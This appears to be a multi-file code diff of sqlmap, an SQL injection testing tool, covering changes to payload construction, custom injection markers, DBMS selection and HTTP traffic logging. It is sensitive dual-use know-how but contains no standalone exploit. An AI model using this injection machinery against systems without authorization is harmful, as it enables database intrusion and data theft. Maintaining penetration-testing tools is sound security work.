from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||
from lib.core.settings import GENERIC_SQL_COMMENT
|
||||
@@ -101,7 +100,7 @@ class Agent(object):
|
||||
if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
|
||||
paramString = origValue
|
||||
if place == PLACE.URI:
|
||||
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
||||
origValue = origValue.split(kb.customInjectionMark)[0]
|
||||
else:
|
||||
origValue = filter(None, (re.search(_, origValue.split(BOUNDED_INJECTION_MARKER)[0]) for _ in (r"\w+\Z", r"[^\"'><]+\Z", r"[^ ]+\Z")))[0].group(0)
|
||||
origValue = origValue[origValue.rfind('/') + 1:]
|
||||
@@ -110,19 +109,19 @@ class Agent(object):
|
||||
origValue = origValue[origValue.rfind(char) + 1:]
|
||||
elif place == PLACE.CUSTOM_POST:
|
||||
paramString = origValue
|
||||
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
||||
origValue = origValue.split(kb.customInjectionMark)[0]
|
||||
if kb.postHint in (POST_HINT.SOAP, POST_HINT.XML):
|
||||
origValue = origValue.split('>')[-1]
|
||||
elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
|
||||
origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)\s*(?P<result>[^"\[,]+\Z)', origValue)
|
||||
origValue = extractRegexResult(r"(?s)\"\s*:\s*(?P<result>\d+\Z)", origValue) or extractRegexResult(r'(?s)[\s:]*(?P<result>[^"\[,]+\Z)', origValue)
|
||||
else:
|
||||
_ = extractRegexResult(r"(?s)(?P<result>[^\s<>{}();'\"&]+\Z)", origValue) or ""
|
||||
origValue = _.split('=', 1)[1] if '=' in _ else ""
|
||||
elif place == PLACE.CUSTOM_HEADER:
|
||||
paramString = origValue
|
||||
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
|
||||
origValue = origValue.split(kb.customInjectionMark)[0]
|
||||
origValue = origValue[origValue.find(',') + 1:]
|
||||
match = re.search(r"([^;]+)=(?P<value>[^;]+);?\Z", origValue)
|
||||
match = re.search(r"([^;]+)=(?P<value>[^;]*);?\Z", origValue)
|
||||
if match:
|
||||
origValue = match.group("value")
|
||||
elif ',' in paramString:
|
||||
@@ -131,6 +130,8 @@ class Agent(object):
|
||||
if header.upper() == HTTP_HEADER.AUTHORIZATION.upper():
|
||||
origValue = origValue.split(' ')[-1].split(':')[-1]
|
||||
|
||||
origValue = origValue or ""
|
||||
|
||||
if value is None:
|
||||
if where == PAYLOAD.WHERE.ORIGINAL:
|
||||
value = origValue
|
||||
@@ -159,17 +160,16 @@ class Agent(object):
|
||||
newValue = self.cleanupPayload(newValue, origValue)
|
||||
|
||||
if place in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER):
|
||||
_ = "%s%s" % (origValue, CUSTOM_INJECTION_MARK_CHAR)
|
||||
_ = "%s%s" % (origValue, kb.customInjectionMark)
|
||||
if kb.postHint == POST_HINT.JSON and not isNumber(newValue) and not '"%s"' % _ in paramString:
|
||||
newValue = '"%s"' % newValue
|
||||
elif kb.postHint == POST_HINT.JSON_LIKE and not isNumber(newValue) and not "'%s'" % _ in paramString:
|
||||
newValue = "'%s'" % newValue
|
||||
newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER)
|
||||
newValue = newValue.replace(kb.customInjectionMark, REPLACEMENT_MARKER)
|
||||
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
|
||||
retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR)
|
||||
retVal = retVal.replace(kb.customInjectionMark, "").replace(REPLACEMENT_MARKER, kb.customInjectionMark)
|
||||
elif BOUNDED_INJECTION_MARKER in paramDict[parameter]:
|
||||
_ = "%s%s" % (origValue, BOUNDED_INJECTION_MARKER)
|
||||
retVal = "%s=%s" % (re.sub(r" (\#\d\*|\(.+\))\Z", "", parameter), paramString.replace(_, self.addPayloadDelimiters(newValue)))
|
||||
retVal = paramString.replace("%s%s" % (origValue, BOUNDED_INJECTION_MARKER), self.addPayloadDelimiters(newValue))
|
||||
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
|
||||
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
|
||||
else:
|
||||
@@ -347,6 +347,12 @@ class Agent(object):
|
||||
if payload:
|
||||
payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec))
|
||||
|
||||
for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
|
||||
payload = payload.replace(_, str(randomInt()))
|
||||
|
||||
for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)):
|
||||
payload = payload.replace(_, randomStr())
|
||||
|
||||
return payload
|
||||
|
||||
def getComment(self, request):
|
||||
@@ -858,7 +864,7 @@ class Agent(object):
|
||||
if expression.find(queries[Backend.getIdentifiedDbms()].limitstring.query) > 0:
|
||||
_ = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query)
|
||||
else:
|
||||
_ = expression.index("LIMIT ")
|
||||
_ = re.search(r"\bLIMIT\b", expression, re.I).start()
|
||||
expression = expression[:_]
|
||||
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
||||
|
||||
@@ -97,8 +97,8 @@ from lib.core.settings import BOUNDED_INJECTION_MARKER
|
||||
from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES
|
||||
from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES
|
||||
from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK
|
||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||
from lib.core.settings import DBMS_DIRECTORY_DICT
|
||||
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
|
||||
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
|
||||
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
|
||||
from lib.core.settings import DEFAULT_MSSQL_SCHEMA
|
||||
@@ -435,7 +435,7 @@ class Backend:
|
||||
# Get methods
|
||||
@staticmethod
|
||||
def getForcedDbms():
|
||||
return aliasToDbmsEnum(kb.get("forcedDbms"))
|
||||
return aliasToDbmsEnum(conf.get("forceDbms")) or aliasToDbmsEnum(kb.get("forcedDbms"))
|
||||
|
||||
@staticmethod
|
||||
def getDbms():
|
||||
@@ -635,7 +635,7 @@ def paramToDict(place, parameters=None):
|
||||
current[key] = "%s%s" % (str(value).lower(), BOUNDED_INJECTION_MARKER)
|
||||
else:
|
||||
current[key] = "%s%s" % (value, BOUNDED_INJECTION_MARKER)
|
||||
candidates["%s (%s)" % (parameter, key)] = re.sub("(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), r"\g<1>%s" % json.dumps(deserialized), parameters)
|
||||
candidates["%s (%s)" % (parameter, key)] = re.sub(r"\b(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), r"\g<1>%s" % json.dumps(deserialized), parameters)
|
||||
current[key] = original
|
||||
|
||||
deserialized = json.loads(testableParameters[parameter])
|
||||
@@ -654,12 +654,12 @@ def paramToDict(place, parameters=None):
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
_ = re.sub(regex, "\g<1>%s\g<%d>" % (CUSTOM_INJECTION_MARK_CHAR, len(match.groups())), testableParameters[parameter])
|
||||
_ = re.sub(regex, r"\g<1>%s\g<%d>" % (kb.customInjectionMark, len(match.groups())), testableParameters[parameter])
|
||||
message = "it appears that provided value for %s parameter '%s' " % (place, parameter)
|
||||
message += "has boundaries. Do you want to inject inside? ('%s') [y/N] " % getUnicode(_)
|
||||
|
||||
if readInput(message, default='N', boolean=True):
|
||||
testableParameters[parameter] = re.sub(regex, "\g<1>%s\g<2>" % BOUNDED_INJECTION_MARKER, testableParameters[parameter])
|
||||
testableParameters[parameter] = re.sub(r"\b(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), (r"\g<1>%s" % re.sub(regex, r"\g<1>%s\g<2>" % BOUNDED_INJECTION_MARKER, testableParameters[parameter])).replace("\\", r"\\"), parameters)
|
||||
break
|
||||
|
||||
if conf.testParameter:
|
||||
@@ -1118,6 +1118,13 @@ def sanitizeStr(value):
|
||||
return getUnicode(value).replace("\n", " ").replace("\r", "")
|
||||
|
||||
def getHeader(headers, key):
|
||||
"""
|
||||
Returns header value ignoring the letter case
|
||||
|
||||
>>> getHeader({"Foo": "bar"}, "foo")
|
||||
'bar'
|
||||
"""
|
||||
|
||||
retVal = None
|
||||
for _ in (headers or {}):
|
||||
if _.upper() == key.upper():
|
||||
@@ -1132,6 +1139,9 @@ def checkFile(filename, raiseOnError=True):
|
||||
|
||||
valid = True
|
||||
|
||||
if filename:
|
||||
filename = filename.strip('"\'')
|
||||
|
||||
try:
|
||||
if filename is None or not os.path.isfile(filename):
|
||||
valid = False
|
||||
@@ -1196,8 +1206,7 @@ def cleanQuery(query):
|
||||
|
||||
for sqlStatements in SQL_STATEMENTS.values():
|
||||
for sqlStatement in sqlStatements:
|
||||
sqlStatementEsc = sqlStatement.replace("(", "\\(")
|
||||
queryMatch = re.search("(%s)" % sqlStatementEsc, query, re.I)
|
||||
queryMatch = re.search("(?i)\b(%s)\b" % sqlStatement.replace("(", "").replace(")", "").strip(), query)
|
||||
|
||||
if queryMatch and "sys_exec" not in query:
|
||||
retVal = retVal.replace(queryMatch.group(1), sqlStatement.upper())
|
||||
@@ -1273,6 +1282,8 @@ def parseTargetDirect():
|
||||
if not conf.direct:
|
||||
return
|
||||
|
||||
conf.direct = conf.direct.encode(UNICODE_ENCODING) # some DBMS connectors (e.g. pymssql) don't like Unicode with non-US letters
|
||||
|
||||
details = None
|
||||
remote = False
|
||||
|
||||
@@ -1289,8 +1300,8 @@ def parseTargetDirect():
|
||||
if conf.dbmsCred:
|
||||
conf.dbmsUser, conf.dbmsPass = conf.dbmsCred.split(':')
|
||||
else:
|
||||
conf.dbmsUser = unicode()
|
||||
conf.dbmsPass = unicode()
|
||||
conf.dbmsUser = ""
|
||||
conf.dbmsPass = ""
|
||||
|
||||
if not conf.dbmsPass:
|
||||
conf.dbmsPass = None
|
||||
@@ -1386,7 +1397,7 @@ def parseTargetUrl():
|
||||
else:
|
||||
conf.url = "http://" + conf.url
|
||||
|
||||
if CUSTOM_INJECTION_MARK_CHAR in conf.url:
|
||||
if kb.customInjectionMark in conf.url:
|
||||
conf.url = conf.url.replace('?', URI_QUESTION_MARKER)
|
||||
|
||||
try:
|
||||
@@ -1404,7 +1415,7 @@ def parseTargetUrl():
|
||||
conf.hostname = hostnamePort[0].strip()
|
||||
|
||||
conf.ipv6 = conf.hostname != conf.hostname.strip("[]")
|
||||
conf.hostname = conf.hostname.strip("[]").replace(CUSTOM_INJECTION_MARK_CHAR, "")
|
||||
conf.hostname = conf.hostname.strip("[]").replace(kb.customInjectionMark, "")
|
||||
|
||||
try:
|
||||
_ = conf.hostname.encode("idna")
|
||||
@@ -1428,7 +1439,7 @@ def parseTargetUrl():
|
||||
else:
|
||||
conf.port = 80
|
||||
|
||||
if conf.port < 0 or conf.port > 65535:
|
||||
if conf.port < 1 or conf.port > 65535:
|
||||
errMsg = "invalid target URL's port (%d)" % conf.port
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
@@ -1445,7 +1456,7 @@ def parseTargetUrl():
|
||||
debugMsg = "setting the HTTP Referer header to the target URL"
|
||||
logger.debug(debugMsg)
|
||||
conf.httpHeaders = [_ for _ in conf.httpHeaders if _[0] != HTTP_HEADER.REFERER]
|
||||
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url.replace(CUSTOM_INJECTION_MARK_CHAR, "")))
|
||||
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url.replace(kb.customInjectionMark, "")))
|
||||
|
||||
if not conf.host and (intersect(HOST_ALIASES, conf.testParameter, True) or conf.level >= 5):
|
||||
debugMsg = "setting the HTTP Host header to the target URL"
|
||||
@@ -1507,16 +1518,25 @@ def getLimitRange(count, plusOne=False):
|
||||
retVal = None
|
||||
count = int(count)
|
||||
limitStart, limitStop = 1, count
|
||||
reverse = False
|
||||
|
||||
if kb.dumpTable:
|
||||
if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop:
|
||||
limitStop = conf.limitStop
|
||||
if conf.limitStart and conf.limitStop and conf.limitStart > conf.limitStop:
|
||||
limitStop = conf.limitStart
|
||||
limitStart = conf.limitStop
|
||||
reverse = True
|
||||
else:
|
||||
if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop:
|
||||
limitStop = conf.limitStop
|
||||
|
||||
if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:
|
||||
limitStart = conf.limitStart
|
||||
if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:
|
||||
limitStart = conf.limitStart
|
||||
|
||||
retVal = xrange(limitStart, limitStop + 1) if plusOne else xrange(limitStart - 1, limitStop)
|
||||
|
||||
if reverse:
|
||||
retVal = xrange(retVal[-1], retVal[0] - 1, -1)
|
||||
|
||||
return retVal
|
||||
|
||||
def parseUnionPage(page):
|
||||
@@ -1618,6 +1638,13 @@ def getRemoteIP():
|
||||
return retVal
|
||||
|
||||
def getFileType(filePath):
|
||||
"""
|
||||
Returns "magic" file type for given file path
|
||||
|
||||
>>> getFileType(__file__)
|
||||
'text'
|
||||
"""
|
||||
|
||||
try:
|
||||
_ = magic.from_file(filePath)
|
||||
except:
|
||||
@@ -1970,7 +1997,7 @@ def getSQLSnippet(dbms, sfile, **variables):
|
||||
retVal = re.sub(r";\s+", "; ", retVal).strip("\r\n")
|
||||
|
||||
for _ in variables.keys():
|
||||
retVal = re.sub(r"%%%s%%" % _, variables[_], retVal)
|
||||
retVal = re.sub(r"%%%s%%" % _, variables[_].replace('\\', r'\\'), retVal)
|
||||
|
||||
for _ in re.findall(r"%RANDSTR\d+%", retVal, re.I):
|
||||
retVal = retVal.replace(_, randomStr())
|
||||
@@ -2097,6 +2124,9 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un
|
||||
|
||||
retVal = list() if not unique else OrderedDict()
|
||||
|
||||
if filename:
|
||||
filename = filename.strip('"\'')
|
||||
|
||||
checkFile(filename)
|
||||
|
||||
try:
|
||||
@@ -2544,7 +2574,7 @@ def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False):
|
||||
# corner case when character % really needs to be
|
||||
# encoded (when not representing URL encoded char)
|
||||
# except in cases when tampering scripts are used
|
||||
if all(map(lambda x: '%' in x, [safe, value])) and not kb.tamperFunctions:
|
||||
if all('%' in _ for _ in (safe, value)) and not kb.tamperFunctions:
|
||||
value = re.sub("%(?![0-9a-fA-F]{2})", "%25", value)
|
||||
|
||||
while True:
|
||||
@@ -2596,18 +2626,19 @@ def runningAsAdmin():
|
||||
|
||||
return isAdmin
|
||||
|
||||
def logHTTPTraffic(requestLogMsg, responseLogMsg):
|
||||
def logHTTPTraffic(requestLogMsg, responseLogMsg, startTime=None, endTime=None):
|
||||
"""
|
||||
Logs HTTP traffic to the output file
|
||||
"""
|
||||
|
||||
if not conf.trafficFile:
|
||||
return
|
||||
if conf.harFile:
|
||||
conf.httpCollector.collectRequest(requestLogMsg, responseLogMsg, startTime, endTime)
|
||||
|
||||
with kb.locks.log:
|
||||
dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep))
|
||||
dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep))
|
||||
dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep))
|
||||
if conf.trafficFile:
|
||||
with kb.locks.log:
|
||||
dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep))
|
||||
dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep))
|
||||
dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep))
|
||||
|
||||
def getPageTemplate(payload, place): # Cross-linked function
|
||||
raise NotImplementedError
|
||||
@@ -3176,13 +3207,13 @@ def decodeIntToUnicode(value):
|
||||
|
||||
if Backend.isDbms(DBMS.MYSQL):
|
||||
# https://github.com/sqlmapproject/sqlmap/issues/1531
|
||||
retVal = getUnicode(raw, conf.charset or UNICODE_ENCODING)
|
||||
retVal = getUnicode(raw, conf.encoding or UNICODE_ENCODING)
|
||||
elif Backend.isDbms(DBMS.MSSQL):
|
||||
retVal = getUnicode(raw, "UTF-16-BE")
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE):
|
||||
retVal = unichr(value)
|
||||
else:
|
||||
retVal = getUnicode(raw, conf.charset)
|
||||
retVal = getUnicode(raw, conf.encoding)
|
||||
else:
|
||||
retVal = getUnicode(chr(value))
|
||||
except:
|
||||
@@ -3533,11 +3564,11 @@ def safeSQLIdentificatorNaming(name, isTable=False):
|
||||
if retVal.upper() in kb.keywords or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ("." if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal)
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS):
|
||||
retVal = "`%s`" % retVal.strip("`")
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.SQLITE, DBMS.INFORMIX, DBMS.HSQLDB):
|
||||
retVal = "\"%s\"" % retVal.strip("\"")
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,):
|
||||
retVal = "\"%s\"" % retVal.strip("\"").upper()
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,) and ((retVal or " ")[0].isdigit() or not re.match(r"\A\w+\Z", retVal, re.U)):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and ((retVal or " ")[0].isdigit() or not re.match(r"\A\w+\Z", retVal, re.U)):
|
||||
retVal = "[%s]" % retVal.strip("[]")
|
||||
|
||||
if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal):
|
||||
@@ -3555,11 +3586,11 @@ def unsafeSQLIdentificatorNaming(name):
|
||||
if isinstance(name, basestring):
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS):
|
||||
retVal = name.replace("`", "")
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.SQLITE, DBMS.INFORMIX, DBMS.HSQLDB):
|
||||
retVal = name.replace("\"", "")
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,):
|
||||
retVal = name.replace("\"", "").upper()
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,):
|
||||
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
||||
retVal = name.replace("[", "").replace("]", "")
|
||||
|
||||
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
|
||||
@@ -4385,6 +4416,9 @@ def getSafeExString(ex, encoding=None):
|
||||
"""
|
||||
Safe way how to get the proper exception represtation as a string
|
||||
(Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161'))
|
||||
|
||||
>>> getSafeExString(Exception('foobar'))
|
||||
u'foobar'
|
||||
"""
|
||||
|
||||
retVal = ex
|
||||
@@ -4394,4 +4428,4 @@ def getSafeExString(ex, encoding=None):
|
||||
elif getattr(ex, "msg", None):
|
||||
retVal = ex.msg
|
||||
|
||||
return getUnicode(retVal, encoding=encoding)
|
||||
return getUnicode(retVal or "", encoding=encoding).strip()
|
||||
|
||||
@@ -110,7 +110,7 @@ def hexdecode(value):
|
||||
value = value.lower()
|
||||
return (value[2:] if value.startswith("0x") else value).decode("hex")
|
||||
|
||||
def hexencode(value):
|
||||
def hexencode(value, encoding=None):
|
||||
"""
|
||||
Encodes string value from plain to hex format
|
||||
|
||||
@@ -118,7 +118,7 @@ def hexencode(value):
|
||||
'666f6f626172'
|
||||
"""
|
||||
|
||||
return utf8encode(value).encode("hex")
|
||||
return unicodeencode(value, encoding).encode("hex")
|
||||
|
||||
def unicodeencode(value, encoding=None):
|
||||
"""
|
||||
|
||||
@@ -272,6 +272,7 @@ DEPRECATED_OPTIONS = {
|
||||
"--no-unescape": "use '--no-escape' instead",
|
||||
"--binary": "use '--binary-fields' instead",
|
||||
"--auth-private": "use '--auth-file' instead",
|
||||
"--ignore-401": "use '--ignore-code' instead",
|
||||
"--check-payload": None,
|
||||
"--check-waf": None,
|
||||
"--pickled-options": "use '--api -c ...' instead",
|
||||
|
||||
@@ -184,6 +184,7 @@ class HTTP_HEADER:
|
||||
USER_AGENT = "User-Agent"
|
||||
VIA = "Via"
|
||||
X_POWERED_BY = "X-Powered-By"
|
||||
X_DATA_ORIGIN = "X-Data-Origin"
|
||||
|
||||
class EXPECTED:
|
||||
BOOL = "bool"
|
||||
@@ -369,6 +370,7 @@ class MKSTEMP_PREFIX:
|
||||
RESULTS = "sqlmapresults-"
|
||||
COOKIE_JAR = "sqlmapcookiejar-"
|
||||
BIG_ARRAY = "sqlmapbigarray-"
|
||||
SPECIFIC_RESPONSE = "sqlmapresponse-"
|
||||
|
||||
class TIMEOUT_STATE:
|
||||
NORMAL = 0
|
||||
|
||||
@@ -50,6 +50,9 @@ class SqlmapUserQuitException(SqlmapBaseException):
|
||||
class SqlmapShellQuitException(SqlmapBaseException):
|
||||
pass
|
||||
|
||||
class SqlmapSkipTargetException(SqlmapBaseException):
|
||||
pass
|
||||
|
||||
class SqlmapSyntaxException(SqlmapBaseException):
|
||||
pass
|
||||
|
||||
|
||||
@@ -110,7 +110,7 @@ from lib.core.settings import DEFAULT_PAGE_ENCODING
|
||||
from lib.core.settings import DEFAULT_TOR_HTTP_PORTS
|
||||
from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS
|
||||
from lib.core.settings import DUMMY_URL
|
||||
from lib.core.settings import INJECT_HERE_MARK
|
||||
from lib.core.settings import INJECT_HERE_REGEX
|
||||
from lib.core.settings import IS_WIN
|
||||
from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
|
||||
from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET
|
||||
@@ -149,6 +149,7 @@ from lib.request.pkihandler import HTTPSPKIAuthHandler
|
||||
from lib.request.rangehandler import HTTPRangeHandler
|
||||
from lib.request.redirecthandler import SmartRedirectHandler
|
||||
from lib.request.templates import getPageTemplate
|
||||
from lib.utils.har import HTTPCollectorFactory
|
||||
from lib.utils.crawler import crawl
|
||||
from lib.utils.deps import checkDependencies
|
||||
from lib.utils.search import search
|
||||
@@ -232,7 +233,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||
reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S)
|
||||
|
||||
for match in reqResList:
|
||||
request = match if isinstance(match, basestring) else match.group(1)
|
||||
request = match if isinstance(match, basestring) else match.group(0)
|
||||
request = re.sub(r"\A[^\w]+", "", request)
|
||||
|
||||
schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S)
|
||||
@@ -240,6 +241,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||
if schemePort:
|
||||
scheme = schemePort.group(1)
|
||||
port = schemePort.group(2)
|
||||
request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip())
|
||||
else:
|
||||
scheme, port = None, None
|
||||
|
||||
@@ -278,7 +280,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||
method = match.group(1)
|
||||
url = match.group(2)
|
||||
|
||||
if any(_ in line for _ in ('?', '=', CUSTOM_INJECTION_MARK_CHAR)):
|
||||
if any(_ in line for _ in ('?', '=', kb.customInjectionMark)):
|
||||
params = True
|
||||
|
||||
getPostReq = True
|
||||
@@ -318,7 +320,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||
elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION):
|
||||
headers.append((getUnicode(key), getUnicode(value)))
|
||||
|
||||
if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
|
||||
if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
|
||||
params = True
|
||||
|
||||
data = data.rstrip("\r\n") if data else data
|
||||
@@ -484,7 +486,7 @@ def _setRequestFromFile():
|
||||
conf.requestFile = safeExpandUser(conf.requestFile)
|
||||
|
||||
if not os.path.isfile(conf.requestFile):
|
||||
errMsg = "the specified HTTP request file "
|
||||
errMsg = "specified HTTP request file '%s' " % conf.requestFile
|
||||
errMsg += "does not exist"
|
||||
raise SqlmapFilePathException(errMsg)
|
||||
|
||||
@@ -591,7 +593,7 @@ def _setBulkMultipleTargets():
|
||||
|
||||
found = False
|
||||
for line in getFileItems(conf.bulkFile):
|
||||
if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line:
|
||||
if re.match(r"[^ ]+\?(.+)", line, re.I) or kb.customInjectionMark in line:
|
||||
found = True
|
||||
kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None))
|
||||
|
||||
@@ -627,7 +629,7 @@ def _findPageForms():
|
||||
logger.info(infoMsg)
|
||||
|
||||
if not any((conf.bulkFile, conf.googleDork, conf.sitemapUrl)):
|
||||
page, _ = Request.queryPage(content=True)
|
||||
page, _, _ = Request.queryPage(content=True)
|
||||
findPageForms(page, conf.url, True, True)
|
||||
else:
|
||||
if conf.bulkFile:
|
||||
@@ -1407,8 +1409,8 @@ def _setHTTPExtraHeaders():
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
elif not conf.requestFile and len(conf.httpHeaders or []) < 2:
|
||||
if conf.charset:
|
||||
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset))
|
||||
if conf.encoding:
|
||||
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.encoding))
|
||||
|
||||
# Invalidating any caching mechanism in between
|
||||
# Reference: http://stackoverflow.com/a/1383359
|
||||
@@ -1683,17 +1685,28 @@ def _cleanupOptions():
|
||||
if conf.optimize:
|
||||
setOptimize()
|
||||
|
||||
if conf.data:
|
||||
conf.data = re.sub("(?i)%s" % INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.data)
|
||||
match = re.search(INJECT_HERE_REGEX, conf.data or "")
|
||||
if match:
|
||||
kb.customInjectionMark = match.group(0)
|
||||
|
||||
if conf.url:
|
||||
conf.url = re.sub("(?i)%s" % INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.url)
|
||||
match = re.search(INJECT_HERE_REGEX, conf.url or "")
|
||||
if match:
|
||||
kb.customInjectionMark = match.group(0)
|
||||
|
||||
if conf.os:
|
||||
conf.os = conf.os.capitalize()
|
||||
|
||||
if conf.forceDbms:
|
||||
conf.dbms = conf.forceDbms
|
||||
|
||||
if conf.dbms:
|
||||
conf.dbms = conf.dbms.capitalize()
|
||||
kb.dbmsFilter = []
|
||||
for _ in conf.dbms.split(','):
|
||||
for dbms, aliases in DBMS_ALIASES:
|
||||
if _.strip().lower() in aliases:
|
||||
kb.dbmsFilter.append(dbms)
|
||||
conf.dbms = dbms if conf.dbms and ',' not in conf.dbms else None
|
||||
break
|
||||
|
||||
if conf.testFilter:
|
||||
conf.testFilter = conf.testFilter.strip('*+')
|
||||
@@ -1828,6 +1841,7 @@ def _setConfAttributes():
|
||||
conf.dumpPath = None
|
||||
conf.hashDB = None
|
||||
conf.hashDBFile = None
|
||||
conf.httpCollector = None
|
||||
conf.httpHeaders = []
|
||||
conf.hostname = None
|
||||
conf.ipv6 = False
|
||||
@@ -1843,6 +1857,7 @@ def _setConfAttributes():
|
||||
conf.scheme = None
|
||||
conf.tests = []
|
||||
conf.trafficFP = None
|
||||
conf.HARCollectorFactory = None
|
||||
conf.wFileType = None
|
||||
|
||||
def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
@@ -1862,6 +1877,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.authHeader = None
|
||||
kb.bannerFp = AttribDict()
|
||||
kb.binaryField = False
|
||||
kb.browserVerification = None
|
||||
|
||||
kb.brute = AttribDict({"tables": [], "columns": []})
|
||||
kb.bruteMode = False
|
||||
@@ -1889,11 +1905,13 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.connErrorCounter = 0
|
||||
kb.cookieEncodeChoice = None
|
||||
kb.counters = {}
|
||||
kb.customInjectionMark = CUSTOM_INJECTION_MARK_CHAR
|
||||
kb.data = AttribDict()
|
||||
kb.dataOutputFlag = False
|
||||
|
||||
# Active back-end DBMS fingerprint
|
||||
kb.dbms = None
|
||||
kb.dbmsFilter = []
|
||||
kb.dbmsVersion = [UNKNOWN_DBMS_VERSION]
|
||||
|
||||
